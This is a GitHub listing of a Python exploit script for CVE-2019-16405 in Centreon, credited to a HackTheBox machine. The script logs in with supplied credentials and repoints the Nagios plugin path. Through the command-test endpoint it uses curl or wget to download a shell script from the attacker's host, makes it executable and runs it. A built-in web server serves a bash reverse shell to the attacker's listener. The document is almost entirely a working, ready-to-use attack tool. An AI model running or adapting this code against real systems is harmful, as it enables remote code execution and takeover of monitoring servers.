-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2019-16405.py
57 lines (53 loc) · 3.46 KB
/
CVE-2019-16405.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
info = """
###################################################################################
# Thanks to BirdsArentReal team contribution at HackTheBox platform! #
# Discovered at https://hackthebox.eu - Machine Wall #
# enjloezz & TheCyberGeek #
###################################################################################
"""
import requests
import re
import sys
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer
import _thread
class S(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.wfile.write("""#!/bin/bash\nbash -i >& /dev/tcp/{}/{} 0>&1""".format(ip, port).encode("utf-8"))
def run(server_class=HTTPServer, handler_class=S, port=80):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
httpd.serve_forever()
if len(sys.argv) < 6:
print(info)
print("Start Listener before start exploit")
print("Methods: curl, wget")
print("Usage:\texploit.py url username password ip port curl")
print("Ex:\texploit.py http://10.0.0.2/centreon admin S3cUr3_p4ssw0rd 10.0.0.1 4444 curl")
sys.exit(0)
else:
base_path, username, password, ip, port, method = sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6]
_thread.start_new_thread(run,())
s = requests.Session()
f = s.get(base_path + "/index.php")
token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
if token:
f = s.post(base_path + "/index.php", data={"useralias": username, "password": password, "centreon_token": token, "submitLogin": "Connect"})
if "You need to enable JavaScript to run this app" in f.text:
print("Login Successful!")
f = s.get(base_path + "/main.get.php?p=60904&o=c&resource_id=1")
token = re.search("""name="centreon_token".* value="(.*?)" />""", f.text).group(1)
old_path = re.search("""name="resource_line".* value="(.*?)" />""", f.text).group(1)
f = s.post(base_path + "/main.get.php?p=60904", data={"resource_name": """$USER1$""", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": """a:0:{}""", "centreon_token": token})
print("Sending Payload")
s.get(base_path + "/main.get.php?p=60801&command_hostaddress=&command_example=&command_line={}&o=p&min=1".format(urllib.parse.quote("/bin/bash -c \"" + ( "curl {}/shell.sh -o".format(ip) if "curl" is method else "wget {}/shell.sh -O".format(ip) ) + "/tmp/shell\"")))
print("Setting permissions for the payload")
s.get(base_path + "/main.get.php?p=60801&command_hostaddress=&command_example=&command_line={}&o=p&min=1".format(urllib.parse.quote("/bin/bash -c \"chmod 777 /tmp/shell\"")))
print("Executing Payload\nCheck your listener!")
s.get(base_path + "/main.get.php?p=60801&command_hostaddress=&command_example=&command_line={}&o=p&min=1".format(urllib.parse.quote("/tmp/shell")))
f = s.post(base_path + "/main.get.php?p=60904", data={"resource_name": """$USER1$""", "resource_line": old_path, "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": """a:0:{}""", "centreon_token": token})
else:
print("Cannot login to Centreon")
else:
print("Couldn't get token, check your URL")